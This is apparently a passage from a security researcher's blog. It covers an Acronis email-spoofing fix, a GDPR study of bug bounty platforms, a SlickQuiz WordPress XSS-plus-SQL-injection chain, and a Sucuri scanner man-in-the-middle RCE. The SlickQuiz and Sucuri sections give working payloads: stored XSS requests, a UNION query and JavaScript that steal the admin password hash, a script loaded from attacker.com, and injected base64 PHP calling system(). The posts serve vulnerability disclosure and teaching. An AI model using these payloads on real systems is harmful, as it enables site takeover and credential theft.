This involves a variety of “customizations” for the email including a base64-encoded attachments value. Issuing this POST request returns null:

but ultimately sends out the email to the given mainRecipients including some attachments:

Perfectly spoofed mail, right ;-) ?
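As a side note, the attachments object simply maps a filename to the base64 of the raw file content; the PHU+... value above decodes to a small HTML snippet. A quick sketch for preparing an arbitrary attachment (the filename is hypothetical):

# The "attachments" field maps a filename to base64(raw file content).
import base64

content = b"<u>Some more fun here</u>"    # this is what the value used above decodes to
encoded = base64.b64encode(content).decode()
print(encoded)                            # PHU+U29tZSBtb3JlIGZ1biBoZXJlPC91Pg==

attachments = {"backdoor.html": encoded}  # hypothetical filename for the JSON payload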

The Fix

Acronis fixed the vulnerability in version v12.5 Build 16342 of Acronis Cyber Backup by changing the way that get_ams_address gets the actual Shard address. It now requires an additional authorization header with a JWT that is passed to a method called resolve_shard_address:

# WebServer/wcs/web/temp_ams_proxy.py:
def get_ams_address(headers):
    if config.is_msp_environment():
        auth = headers.get('Authorization')
        _bearer_prefix = 'bearer '
        _bearer_prefix_len = len(_bearer_prefix)
        jwt = auth[_bearer_prefix_len:]
        tenant_id = headers.get('X-Apigw-Tenant-Id')
        logging.info('GET_AMS: tenant_id: {}, jwt: {}'.format(tenant_id, jwt))
        if tenant_id and jwt:
            return wcs.web.session.resolve_shard_address(jwt, tenant_id)

While both values tenant_id and jwt are not explicitly validated here, they are simply used in a new hardcoded call to the API endpoint /api/account_server/tenants/ which ultimately verifies the authorization:

# WebServer/wcs/web/session.py:
def resolve_shard_address(jwt, tenant_id):
    backup_account_server = config.CONFIG['default_backup_account_server']
    url = '{}/api/account_server/tenants/{}'.format(backup_account_server, tenant_id)

    headers = {
        'Authorization': 'Bearer {}'.format(jwt)
    }

    from wcs.web.proxy import make_request
    result = make_request(url,
                          logging.getLogger(),
                          method='GET',
                          headers=headers).json()
    kind = result['kind']
    if kind not in ['unit', 'customer']:
        raise exceptions.unsupported_tenant_kind(kind)
    return result['ams_shard']

Problem solved.

Bug Bounty Platforms vs. GDPR: A Case Study

22 July 2020 at 00:00

What Do Bug Bounty Platforms Store About Their Hackers?

I care a lot about data protection and privacy. I’ve also been in the situation where a bug bounty platform was able to track me down due to an incident, which was the initial trigger to ask myself:

How did they do it? And do I know what these platforms store about me and how they protect this (my) data? Not really. So why not create a little case study to find out what data they process?

One utility that comes in quite handy when trying to get this kind of information (at least for Europeans) is the General Data Protection Regulation (GDPR). The law’s main intention is to give people an extensive right to access and restrict their personal data. Although GDPR is a law of the European Union, it is extra-territorial in scope. So as soon as a company collects data about a European citizen/resident, the company is automatically required to comply with GDPR. This is the case for all bug bounty platforms that I am currently registered on. They probably cover 98% of the world-wide market: HackerOne, Bugcrowd, Synack, Intigriti, and Zerocopter.

Spoiler: All of them have to be GDPR-compliant, but not all seem to have proper processes in place to address GDPR requests.

Creating an Even Playing Field

To create an even playing field, I’ve sent out the same GDPR request to all bug bounty platforms. Since the scenario should be as realistic and real-world as possible, no platform was explicitly informed beforehand that the request, respectively, their answer, is part of a study.

  • All platforms were given the same questions, which should cover most of their GDPR response processes (see Art. 15 GDPR); the questions themselves are listed in the results overview below.
  • All platforms were given the same email aliases to include in their responses.
  • All platforms were asked to hand over a full copy of my personal data.
  • All platforms were given a deadline of one month to respond to the request. Given the increasing COVID situation back in April, all platforms were offered an extension of the deadline (as per Art. 12 par. 3 GDPR).

Analyzing the Results

First of all, to compare responses that differ considerably in style, completeness, accuracy, and thoroughness, I decided to only count what was part of the official answer. Discussions after the official response are not considered, because accepting those might create advantages across competitors. This should give a clear picture of how thoroughly each platform reads and answers the GDPR request.

Instead of going with a kudos (points) system, I’ve decided to use a “traffic light” rating with the following indicators:

  • Green: All good, everything provided, expectations met.
  • Orange: Improvable, at least one (obvious) piece of information is missing or only implicitly answered.
  • Red: Left out, missing a substantial amount of data or a significant data point, and/or unmet expectations.

This light system is then applied to the different GDPR questions and to data points derived either from the questions themselves or from the data provided.

Results Overview

To give you a quick overview of how the different platforms performed, here is a summary of the questions each platform (HackerOne, Bugcrowd, Synack, Intigriti, Zerocopter) was rated against. For a detailed explanation of the individual indicators, have a look at the detailed response evaluations below.

  • Did the platform meet the deadline? (Art. 12 par. 3 GDPR)
  • Did the platform explicitly validate my identity for all provided email addresses? (Art. 12 par. 6 GDPR)
  • Did the platform hand over the results for free? (Art. 12 par. 5 GDPR)
  • Did the platform provide a full copy of my data? (Art. 15 par. 3 GDPR)
  • Is the provided data accurate? (Art. 5 par. 1 (d) GDPR)
  • Specific question: Which personal data about me is stored and/or processed by you? (Art. 15 par. 1 (b) GDPR)
  • Specific question: What is the purpose of processing this data? (Art. 15 par. 1 (a) GDPR)
  • Specific question: Who has received or will receive my personal data (including recipients in third countries and international organizations)? (Art. 15 par. 1 (c) GDPR)
  • Specific question: If the personal data wasn’t supplied directly by me, where does it originate from? (Art. 15 par. 1 (g) GDPR)
  • Specific question: If my personal data has been transferred to a third country or organization, which guarantees are given based on article 46 GDPR? (Art. 15 par. 2 GDPR and Art. 46 GDPR)

Detailed Answers

HackerOne

Request sent out: 01st April 2020
Response received: 30th April 2020
Response style: Email with attachment
Sample of their response:

  • Did the platform meet the deadline? Yes, without an extension.
  • Did the platform explicitly validate my identity for all provided email addresses? Via email: I had to send a random, unique code from each of the mentioned email addresses.
  • Did the platform hand over the results for free? Yes, no fee was charged.
  • Did the platform provide a full copy of my data? No. A copy of the VPN access logs/packet dumps was not provided. However, since this is not a general feature, I do not consider this to be a significant data point, but still a missing one.
  • Is the provided data accurate? Yes.
  • Which personal data about me is stored and/or processed by you? First & last name, email address, IP addresses, phone number, social identities (Twitter, Facebook, LinkedIn), address, shirt size, bio, website, payment information, VPN access & packet log. HackerOne provided a quite extensive list of IP addresses (both IPv4 and IPv6) that I have used, but based on the provided dataset it is not possible to say when they started recording or how long those are retained. HackerOne explicitly mentioned that they are actively logging VPN packets for specific programs; however, they currently do not have any ability to search them for personal data (according to HackerOne, the logs are also not used for anything).
  • What is the purpose of processing this data? To operate our Services, fulfill our contractual obligations in our service contracts with customers, to review and enforce compliance with our terms, guidelines, and policies, to analyze the use of the Services in order to understand how we can improve our content and service offerings and products, for administrative and other business purposes, and matching finders to customer programs.
  • Who has received or will receive my personal data (including recipients in third countries and international organizations)? Zendesk, PayPal, Slack, Intercom, Coinbase, CurrencyCloud, Sterling. While analyzing the provided dataset, I noticed that the list was missing a specific third party called “TripActions”, which is used to book everything around live hacking events. This is a missing data point, but it’s also only a non-general one, so the indicator is only orange. HackerOne added the data point as a result of this study.
  • If the personal data wasn’t supplied directly by me, where does it originate from? HackerOne does not enrich data.
  • If my personal data has been transferred to a third country or organization, which guarantees are given based on article 46 GDPR? This question wasn’t answered as part of the official response. I’ve notified HackerOne about the missing information afterwards, and they’ve provided the following: “Vendors must undergo due diligence as required by GDPR, and where applicable, model clauses are in place.”

Remarks

HackerOne provided an automated and tool-friendly report. While the primary information was summarized in an email, I received quite a huge JSON file, which was easily parsable using your preferred scripting language. However, if a non-technical person received the data this way, they’d probably have issues getting useful information out of it.

Bugcrowd

Request sent out: 1st April 2020
Response received: 17th April 2020
Response style: Email with a screenshot of an Excel table
Sample of their response:

Question Official Answer Comments Indicator
Did the platform meet the deadline? Yes, without an extension. -
Did the platform explicitly validate my identity for all provided email addresses? No identity validation was performed. I’ve sent the request to their official support channel, but there was no explicit validation to verify it’s really me, for neither of my provided email addresses.
Did the platform hand over the results for free? No fee was charged. -
Did the platform provide a full copy of my data? No. Bugcrowd provided a screenshot of what looks like an Excel file with a couple of information on it. In fact, the screenshot you can see above is not even a sample but their complete response.
However, the provided data is not complete since it misses a lot of data points that can be found on the researcher portal, such as a history of authenticated devices (IP addresses see your sessions on your Bugcrowd profile), my ISC2 membership number, everything around the identity verification.

There might be more data points, such as logs collected through the proxies or VPN endpoints that some programs require, but no information was provided about that.

Bugcrowd neither provided anything about the other email addresses I listed nor denied having anything related to them.
Is the provided data accurate? No. The address information, email addresses, and payment information are heavily outdated (they do not reflect my current Bugcrowd settings), which indicates that Bugcrowd stores more than they've provided.
Which personal data about me is stored and/or processed by you? First & last name, address, shirt size, country code, LinkedIn profile, GooglePlus address, previous email address, PayPal email address, website, current IP sign-in, bank information, and the Payoneer ID This was only implicitly answered through the provided copy of my data.

As mentioned before, it seems like there is a significant amount of information missing.
What is the purpose of processing this data? - This question wasn’t answered.
Who has received or will receive my personal data (including recipients in third countries and international organizations)? - This question wasn’t answered.
If the personal data wasn’t supplied directly by me, where does it originate from? - This question wasn’t answered.
If my personal data has been transferred to a third country or organization, which guarantees are given based on article 46 GDPR? - This question wasn’t answered.

Remarks

The “copy of my data” was essentially the screenshot of the Excel file shown above. I was astonished by the compactness of the answer and asked again to have all the listed questions answered as required by the GDPR. What followed was quite a long discussion with the responsible personnel at Bugcrowd. I mentioned more than once that the provided data was inaccurate and incomplete and that they had left out most of the questions, which I am legally entitled to have answered. Still, they insisted that all answers were GDPR-compliant and complete.

I’ve also offered them an extension of the deadline in case they needed more time to evaluate all questions. However, Bugcrowd did not want to take the extension. The discussion ended with the following answer on 17th April:

We’ve done more to respond to you that any other single GDPR request we’ve ever received since the law was passed. We’ve done so during a global pandemic when I think everyone would agree that the world has far more important issues that it is facing. I need to now turn back to those things.

I’ve given up at that point.

Synack

Request sent out: 25th March 2020
Response received: 3rd July 2020
Response style: Email with a collection of PDFs, DOCXs, XLSXs
Sample of their response:

Question Answer Comments Indicator
Did the platform meet the deadline? Yes, with an extension of 2 months. Synack explicitly requested the extension.
Did the platform explicitly validate my identity for all provided email addresses? No. I’ve sent the initial request via their official support channel, but no further identity verification was done.
Did the platform hand over the results for free? No fee was charged. -
Did the platform provide a full copy of my data? Very likely not. Synack uses a VPN solution called “LaunchPoint”, respectively “LaunchPoint+”, which every participant has to connect through when testing targets. What they do know - at least - is when I am connected to the VPN, which target I am connected to, and how long I am connected to it. However, neither a connection log nor a full dump was provided as part of the data copy.

The same applies to the system called “TUPOC”, which was not mentioned.

Synack neither provided anything about the other email addresses I listed nor denied having anything related to them.

Since I consider these to be significant data points in the context of Synack that weren't provided, the indicator is red.
Is the provided data accurate? Yes. The data that was provided is accurate, though.
Which personal data about me is stored and/or processed by you? Identity information: full name, location, nationality, date of birth, age, photograph, passport or other unique ID number, LinkedIn profile, Twitter handle, GitHub handle, website or blog, relevant certifications, and passport details (including number, expiry date, issuing country)

Taxation information: W-BEN tax form information, including personal tax number

Account information: Synack Platform username and password, log information, record of agreement to the Synack Platform agreements (ie terms of use, code of conduct, insider trading policy and privacy policy) and vulnerability submission data;

Contact details: physical address, phone number, and email address

Financial information: bank account details (name of bank, BIC/SWIFT, account type, IBAN number), PayPal account details and payment history for vulnerability submissions

Data with respect to your engagement on the Synack Red Team: Helpdesk communications with Synack, survey response information, data relating to the vulnerabilities you submitted through the Synack Platform and data related to your work on the Synack Platform
Compared to the provided data dump, a couple of data points are missing: last visited date, last clicks on link tracking in emails, browser type and version, operating system, and gender are not mentioned but still processed.

“Log information” in the context of “Account information” and “data related to your work on the Synack Platform” in the context of “Data with respect to your engagement on the Synack Red Team” are too vague, since they could mean anything.

There is no mention of either LaunchPoint, LaunchPoint+ or TUPOC details.

Since I do consider these to be significant data points in the context of Synack, the indicator is red.
What is the purpose of processing this data? Recruitment, including screening of educational and professional background data prior to and during the course of the interviewing process and engagement, including carrying out background checks (where permitted under applicable law).

Compliance with all relevant legal, regulatory and administrative obligations

The administration of payments, special awards and benefits, the management, and the reimbursement of expenses.

Management of researchers

Maintaining and ensuring the communication between Synack and the researchers.

Monitoring researcher compliance with Synack policies

Maintaining the security of Synack’s network customer information
A really positive aspect of this answer is that Synack included the retention times of each data point.
Who has received or will receive my personal data (including recipients in third countries and international organizations)? Cloud storage providers (Amazon Web Services and Google), identification verification providers, payment processors (including PayPal), customer service software providers, communication platforms and messaging platform to allow us to process your customer support tickets and messages, customers, background search firms, applicant tracking system firm. Synack referred to their right to mostly only name “categories of third-parties” except for AWS and Google. While this shows some transparency issues, it is still legal to do so.
If the personal data wasn’t supplied directly by me, where does it originate from? Synack does not enrich data. -
If my personal data has been transferred to a third country or organization, which guarantees are given based on article 46 GDPR? Synack engages third-parties in connection with the operation of Synack’s crowdsourced penetration testing business. To the extent your personal data is stored by these third- party providers, they store your personal data in either the European Economic Area or the United States. The only thing Synack states here is that data is stored in the EEA or the US, but the storage itself is not a safeguard. Therefore the indicator is red.

Remarks

The communication process with Synack was rather slow because it seems like it takes them some time to get information from different vendors.

Update 23rd July 2020:
One document was lost in the conversations with Synack, which turns a couple of their points from red to green. The document was digitally signed, and based on the added proofs, I can confirm that it was signed within the deadline set for the GDPR request. The document itself tries to answer the specific questions, but there are some inconsistencies compared to the also attached copy of the privacy policy (data points being named in one but not the other document), which made it quite hard to create a unique list of data points. However, I've still updated the table for Synack accordingly.

Intigriti

Request sent out: 07th April 2020
Response received: 04th May 2020
Response style: Email with PDF and JSON attachments.
Sample of their response:

Question Answer Comments Indicator
Did the platform meet the deadline? Yes, without an extension. -
Did the platform explicitly validate my identity for all provided email addresses? Yes. Via email. I had to send a random, unique code from each of the mentioned email addresses.
Did the platform hand over the results for free? No fee was charged. -
Did the platform provide a full copy of my data? Yes. I couldn’t find any missing data points.
Is the provided data accurate? Yes. -
Which personal data about me is stored and/or processed by you? First- & last name, address, phone number, email address, website address, Twitter handle, LinkedIn page, shirt size, passport data, email conversation history, accepted program invites, payment information (banking and PayPal), payout history, IP address history of successful logins, history of accepted program terms and conditions, followed programs, reputation tracking, the time when a submission has been viewed.

Data categories processed: User profile information, Identification history information, Personal preference information, Communication preference information, Public preference information, Payment methods, Payout information, Platform reputation information, Program application information, Program credential information, Program invite information, Program reputation information, Program TAC acceptance information, Submission information, Support requests, Commercial requests, Program preference information, Mail group subscription information, CVR Download information, Demo request information, Testimonial information, Contact request information.
I couldn’t find any missing data points.

A long, long time ago, Intigriti had a VPN solution enabled for some of their customers, but I haven't seen it active since, so I no longer consider this data point.
What is the purpose of processing this data? Purpose: Public profile display, Customer relationship management, Identification & authorization, Payout transaction processing, Bookkeeping, Identity checking, Preference management, Researcher support & community management, Submission creation & management, Submission triaging, Submission handling by company, Program credential handling, Program inviting, Program application handling, Status reporting, Reactive notification mail sending, Pro-active notification mail sending, Platform logging & performance analysis. -
Who has received or will receive my personal data (including recipients in third countries and international organizations)? Intercom, Mailerlite, Google Cloud Services, Amazon Web Services, Atlas, Onfido, Several payment providers (TransferWise, PayPal, Pioneer), business accounting software (Yuki), Intigriti staff, Intigriti customers, encrypted backup storage (unnamed), Amazon SES. I’ve noticed a little contradiction in their report: while saying data is transferred to these parties (which includes third-country companies such as Google and Amazon), they also included a “Data Transfer” section saying “We do not transfer any personal information to a third country.”

After asking for clarification, Intigriti told me that they only use the European regions of AWS and Google for hosting.
If the personal data wasn’t supplied directly by me, where does it originate from? Intigriti does not enrich data. -
If my personal data has been transferred to a third country or organization, which guarantees are given based on article 46 GDPR? - This information wasn’t explicitly provided, but can be found in their privacy policy: “We will ensure that any transfer of personal data to countries outside of the European Economic Area will take place pursuant to the appropriate safeguards.”

However, “appropriate safeguards” are not defined.

Remarks

Intigriti provided the most well-written and structured report of all queried platforms, allowing a non-technical reader to get all the necessary information quickly. In addition to that, a bundle of JSON files were provided to read in all data programmatically.

Zerocopter

Request sent out: 14th April 2020
Response received: 12th May 2020
Response style: Email with PDF
Sample of their response:

Question Answer Comments Indicator
Did the platform meet the deadline? Yes, without an extension. -
Did the platform explicitly validate my identity for all provided email addresses? Yes Zerocopter validated all email addresses that I’ve mentioned in my request by asking personal questions about the account in question and by letting me send emails with randomly generated strings from each address.
Did the platform hand over the results for free? No fee was charged. -
Did the platform provide a full copy of my data? Yes. I couldn’t find any missing data points.
Is the provided data accurate? Yes. -
Which personal data about me is stored and/or processed by you? First-, last name, country of residence, bio, email address, passport details, company address, payment details, email conversations, VPN log data (retained for one month), metadata about website visits (such as IP addresses, browser type, date and time), personal information as part of security reports, time spent on pages, contact information with Zerocopter themselves such as provided through email, marketing information (through newsletters). I couldn’t find any missing data points.
What is the purpose of processing this data? Optimisation Website, Application, Services, and provision of information, Implementation of the agreement between you and Zerocopter (maintaining contact) -
Who has received or will receive my personal data (including recipients in third countries and international organizations)? Some data might be transferred outside the European Economic Area, but only with my consent, unless it is required for agreement implementation between Zerocopter and me, if there is an obligation to transmit it to government agencies, a training event is held, or the business gets reorganized. Zerocopter did not explicitly name any of these third-parties, except for “HubSpot”.
If the personal data wasn’t supplied directly by me, where does it originate from? Zerocopter does not enrich data. -
If my personal data has been transferred to a third country or organization, which guarantees are given based on article 46 GDPR? - This information wasn’t explicitly provided, but can be found in their privacy policy: “ These third parties (processors) process your personal data exclusively within our assignment and we conclude processor agreements with these third parties which are compliant with the requirements of GDPR (or its Netherlands ratification AVG)”.

Remarks

For the most part, Zerocopter only cited their privacy policy, which is a bit hard to read for non-legal people.

Conclusion

For me, this small study holds a couple of interesting findings that might or might not surprise you:

  • In general, the European bug bounty platforms Intigriti and Zerocopter do better, or at least seem better prepared for incoming GDPR requests, than their US competitors.
  • Bugcrowd and Synack seem to lack a couple of processes to adequately address GDPR requests, which unfortunately also includes proper identity verification.
  • Compared to Bugcrowd and Synack, HackerOne did quite well, considering they are also US-based. So being a US platform is no excuse for not providing a proper GDPR response.
  • None of the platforms has explicitly and adequately described the safeguards required from their partners to protect personal data. HackerOne handed over this information after their official response; Intigriti and Zerocopter did not explicitly answer that question, but both have (vague) statements about it in their corresponding privacy policies. This point does not seem to be a priority for the platforms, or it is simply a rarely asked question.

See you next year ;-)

H1-4420: From Quiz to Admin - Chaining Two 0-Days to Compromise An Uber Wordpress

10 September 2019 at 00:00

TL;DR

While doing recon for H1-4420, I stumbled upon a Wordpress blog that had a plugin enabled called SlickQuiz. Although the latest version 1.3.7.1 was installed and I haven’t found any publicly disclosed vulnerabilities, it still somehow sounded like a bad idea to run a plugin that hasn’t been tested with the last three major versions of Wordpress.

So I decided to go the very same route as I did already for last year’s H1-3120 which eventually brought me the MVH title: source code review. And it paid off again: This time, I’ve found two vulnerabilities named CVE-2019-12517 (Unauthenticated Stored XSS) and CVE-2019-12516 (Authenticated SQL Injection) which can be chained together to take you from being an unauthenticated Wordpress visitor to the admin credentials.

Due to the sensitivity of the disclosed information, I'm using my own temporarily installed Wordpress blog throughout this article to demonstrate the vulnerabilities and their impact.

CVE-2019-12517: Going From Unauthenticated User to Admin via Stored XSS

During the source code review, I stumbled upon multiple (obvious) stored XSS vulnerabilities when saving user scores of quizzes. Important side note: it does not matter whether the “Save user scores” plugin option is disabled (default) or enabled; the mere presence of a quiz is sufficient for exploitation, since this option only disables/enables the UI elements.

The underlying issue is located in php/slickquiz-scores.php in the method generate_score_row() (lines 38-52) where the responses to quizzes are returned without encoding them first:

function generate_score_row( $score )
        {
            $scoreRow = '';

            $scoreRow .= '<tr>';
            $scoreRow .= '<td class="table_id">' . $score->id . '</td>';
            $scoreRow .= '<td class="table_name">' . $score->name . '</td>';
            $scoreRow .= '<td class="table_email">' . $score->email . '</td>';
            $scoreRow .= '<td class="table_score">' . $score->score . '</td>';
            $scoreRow .= '<td class="table_created">' . $score->createdDate . '</td>';
            $scoreRow .= '<td class="table_actions">' . $this->get_score_actions( $score->id ) . '</td>';
            $scoreRow .= '</tr>';

            return $scoreRow;
        }
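For comparison, a hardened version of this method would have to encode every user-controlled field before concatenating it into the markup. A minimal sketch using WordPress's esc_html() (a hypothetical fix for illustration, not part of SlickQuiz):

function generate_score_row( $score )
        {
            // Hypothetical fix: cast/encode each user-controlled value before output
            $scoreRow  = '<tr>';
            $scoreRow .= '<td class="table_id">' . (int) $score->id . '</td>';
            $scoreRow .= '<td class="table_name">' . esc_html( $score->name ) . '</td>';
            $scoreRow .= '<td class="table_email">' . esc_html( $score->email ) . '</td>';
            $scoreRow .= '<td class="table_score">' . esc_html( $score->score ) . '</td>';
            $scoreRow .= '<td class="table_created">' . esc_html( $score->createdDate ) . '</td>';
            $scoreRow .= '<td class="table_actions">' . $this->get_score_actions( $score->id ) . '</td>';
            $scoreRow .= '</tr>';

            return $scoreRow;
        }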

Since $score->name, $score->email and $score->score are user-controllable, a simple request like the following is enough to get three XSS payloads into the SlickQuiz backend:

POST /wordpress/wp-admin/admin-ajax.php?_wpnonce=593d9fff35 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 165
DNT: 1
Connection: close

action=save_quiz_score&json={"name":"xss<script>alert(1)</script>","email":"test@localhost<script>alert(2)</script>","score":"<script>alert(3)</script>","quiz_id":1}

As soon as any user with access to the SlickQuiz dashboard visits the user scores, all payloads fire immediately:

So far so good. That’s already a pretty good impact, but there must be more.

CVE-2019-12516: Authenticated SQL Injections To the Rescue

The SlickQuiz plugin is also vulnerable to multiple authenticated SQL Injections, almost whenever the id parameter is present in a request. For example, the following requests:

/wp-admin/admin.php?page=slickquiz-scores&id=(select*from(select(sleep(5)))a)
/wp-admin/admin.php?page=slickquiz-edit&id=(select*from(select(sleep(5)))a)
/wp-admin/admin.php?page=slickquiz-preview&id=(select*from(select(sleep(5)))a)

all cause a 5 second delay:

The underlying issue behind, for example, the /wp-admin/admin.php?page=slickquiz-scores&id=(select*from(select(sleep(5)))a) vulnerability is located in php/slickquiz-scores.php in the constructor method (line 20), where the GET parameter id is directly passed to the method get_quiz_by_id():

$quiz = $this->get_quiz_by_id( $_GET['id'] );

The method get_quiz_by_id() itself is defined in php/slickquiz-model.php (lines 27-35):

function get_quiz_by_id( $id )
        {
            global $wpdb;
            $db_name = $wpdb->prefix . 'plugin_slickquiz';

            $quizResult = $wpdb->get_row( "SELECT * FROM $db_name WHERE id = $id" );

            return $quizResult;
        }

Another obvious one.
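For reference, the same lookup could be parameterized via $wpdb->prepare(), which keeps user input out of the statement itself. A minimal sketch of such a hypothetical fix (not part of the plugin):

function get_quiz_by_id( $id )
        {
            global $wpdb;
            $db_name = $wpdb->prefix . 'plugin_slickquiz';

            // Hypothetical fix: bind the id as an integer instead of concatenating
            // the raw GET parameter into the query string.
            return $wpdb->get_row(
                $wpdb->prepare( "SELECT * FROM {$db_name} WHERE id = %d", $id )
            );
        }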

Connecting XSS and SQLi for Takeover

Now let’s connect both vulnerabilities to get a real Wordpress takeover :-)

First of all: Let’s get the essential login details of the first Wordpress user (likely to be the admin): user’s email, login name and hashed password. I’ve built this handy SQLi payload to achieve that:

1337 UNION ALL SELECT NULL,CONCAT(IFNULL(CAST(user_email AS CHAR),0x20),0x3B,IFNULL(CAST(user_login AS CHAR),0x20),0x3B,IFNULL(CAST(user_pass AS CHAR),0x20)),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM wordpress.wp_users--

This eventually returns the requested data within an <h2> tag:

With this payload and a little bit of JavaScript, it’s now possible to exploit the SQLi using a JavaScript XMLHttpRequest:

let url = 'http://localhost/wordpress/wp-admin/admin.php?page=slickquiz-scores&id=';
let payload = '1337 UNION ALL SELECT NULL,CONCAT(IFNULL(CAST(user_email AS CHAR),0x20),0x3B,IFNULL(CAST(user_login AS CHAR),0x20),0x3B,IFNULL(CAST(user_pass AS CHAR),0x20)),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM wordpress.wp_users--'

let xhr = new XMLHttpRequest();
// Send the request with the victim's session cookies so the admin-only page is reachable
xhr.withCredentials = true;

xhr.onreadystatechange = function() {
  if (xhr.readyState === XMLHttpRequest.DONE) {
    // The injected "email;login;hash" string lands in the <h2> page title - grab it via regex
    let result = xhr.responseText.match(/(?:<h2>SlickQuiz Scores for ")(.*)(?:"<\/h2>)/);
    alert(result[1]);
  }
}

xhr.open('GET', url + payload, true);
xhr.send();

Now changing the XSS payload to:

POST /wordpress/wp-admin/admin-ajax.php?_wpnonce=593d9fff35 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 165
DNT: 1
Connection: close

action=save_quiz_score&json={"name":"xss","email":"test@localhost<script src='http://www.attacker.com/slickquiz.js'>","score":"1 / 1","quiz_id":1}

This will cause the XSS to fire and alert the Wordpress credentials:

From this point on, everything’s possible, just like sending this data cross-domain via another XMLHttpRequest etc.

Thanks Uber for the nice bounty!

About a Sucuri RCE…and How Not to Handle Bug Bounty Reports

20 June 2019 at 00:00

TL;DR

Sucuri is a self-proclaimed “most recommended website security service among web professionals” offering protection, monitoring and malware removal services. They ran a Bug Bounty program on HackerOne and also blogged about how important security reports are. While their program was still active, I’ve been hacking on them quite a lot which eventually ranked me #1 on their program.

By the end of 2017, I had found and reported an explicitly disabled SSL certificate validation in their server-side scanner, which could be used by an attacker with MiTM capabilities to execute arbitrary code on Sucuri's customer systems.

The result: Sucuri provided me with an initial bounty of 250 USD for this issue (they added 500 USD later due to a misunderstanding on their side) out of an announced 5000 USD maximum bounty, fixed the issue, closed my report as informative, and went completely silent, apparently to prevent the disclosure of this issue.

Every Sucuri customer who is using the server-side scanner and who installed it on their server before June 2018 should immediately upgrade the server-side scanner to the most recent version which fixes this vulnerability!

SSL Certificate Validation is Overrated

As part of their services, Sucuri offers a custom server-side scanner that runs periodic scans to detect integrity failures and compromises. Basically, the server-side scanner is just a custom PHP script with a random-looking filename such as sucuri-[md5].php, which a customer can place on their webserver.

NOTE: Due to a copyright notice in the script itself, I cannot share the full server-side scanner script here, but will use pseudo-code instead to show its logic. If you want to play with it, register an account with them and grab the script yourself ;-)

<?php
$endpoint = "monitor2";
$pwd = "random-md5";

if(!isset($_GET['run']))
{
    exit(0);
}

if(!isset($_POST['secret']))
{
    exit(0);
}

$c = curl_init();
curl_setopt($c, CURLOPT_URL, "https://$endpoint.sucuri.net/imonitor");
curl_setopt($c, CURLOPT_POSTFIELDS, "p=$pwd&q=".$_POST['secret']); 
curl_setopt($c, CURLOPT_SSL_VERIFYPEER, false);
$result = curl_exec($c);

$b64 =  base64_decode($result);

eval($b64);
?>

As soon as you put the script in the web root of your server and configure your Sucuri account to perform server-side scans, the script instantly gets hit by the Sucuri Integrity Monitor with an HTTP POST request targeting the run method like the following:

This HTTP POST request also includes the secret parameter shown in the pseudo-code above and basically triggers a bunch of IP validations to make sure that only Sucuri is able to trigger the script. Unfortunately, this part is flawed as hell due to stuff like:

$_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR']

(But that’s an entirely different topic and not covered by this post.)

By the end of the script, a curl request is constructed which eventually triggers a callback to the Sucuri monitoring system. However, there is one strange line in the above code:

curl_setopt($c, CURLOPT_SSL_VERIFYPEER, false);

So Sucuri explicitly set CURLOPT_SSL_VERIFYPEER to false. The consequences of this are best described by the curl project itself:

WARNING: disabling verification of the certificate allows bad guys to man-in-the-middle the communication without you knowing it. Disabling verification makes the communication insecure. Just having encryption on a transfer is not enough as you cannot be sure that you are communicating with the correct end-point.

So this is not cool.

The issued callback doesn’t contain anything else than the previously mentioned secret and looks like the following:

The more interesting part is actually the response to the callback which contains a huge base64 string prefixed by the string WORKED::

After decoding it, I noticed that it's simply some PHP code generated on the Sucuri infrastructure to do the actual server-side scanning. So essentially, a man-in-the-middle attacker could simply replace the base64 string with their own PHP code, just like c3lzdGVtKCJ0b3VjaCAvdG1wL3JjZSIpOw== which is equal to system("touch /tmp/rce");:
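As a rough illustration of how little the attacker would need, a man-in-the-middle endpoint could answer the callback with something along these lines (the WORKED: prefix and base64 wrapping mirror the observed response format; everything else is purely illustrative):

<?php
// Illustrative MitM responder: wrap arbitrary PHP in the format the scanner
// expects, so its eval() executes the attacker's code instead of Sucuri's.
$malicious_php = 'system("touch /tmp/rce");';

header('Content-Type: text/plain');
echo 'WORKED:' . base64_encode($malicious_php);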

Which finally leads to the execution of the arbitrary code on the customer’s server:

How Not to Handle Security Reports

This is actually the most interesting part, because communicating with Sucuri was a pain. Since there has been a lot of communication back and forth between me, Sucuri, and HackerOne through different channels, including the platform and email, the following is a summary of the key events and should give a good impression of Sucuri's way of handling security reports.

2017-11-05

I’ve sent the initial report to Sucuri via HackerOne (report #287580)

2017-11-16

Sucuri says that they are aware of the issue, but that CURLOPT_SSL_VERIFYPEER cannot be enabled because many hosters do not offer the proper libraries, and that the attack scenario would require an attacker with MiTM capabilities on the hoster.

MiTM is required - true. But there are many ways to achieve this, and the NSA and Chinese authorities have proven to be capable of such scenarios in the past. And I’m not even talking about sometimes critical compliance requirements such as PCI DSS.

2017-11-17

Sucuri does not think that a MiTM is doable:

Think about it, If MITM the way you are describing was doable, you would be able to hijack emails from almost any provider (as SMTP goes unencrypted), redirect traffic by hijacking Google’s 8.8.8.8 DNS and create much bigger issues across the whole internet.

Isn’t that exactly the reason why we should use TLS across the world and companies such as Google try to enforce it wherever possible?

2017-11-17

I came up with a bunch of other solutions to tackle the “proper libraries issue”:

  1. You could deliver the certificate chain containing only your CA, intermediates and server certificate via a separate file (or as part of your PHP file) to the customer and do the verification of the server certificate within PHP, i.e. using PHP's openssl_x509_parse() (a simplified variant is sketched after this list).
  2. You could add a custom method on the customer-side script to verify a signature delivered with the payload sent from monitor2. As soon as the signature does not match, you could easily discard the payload before calling eval(). The signature to be used must be - of course - cryptographically secure by design.
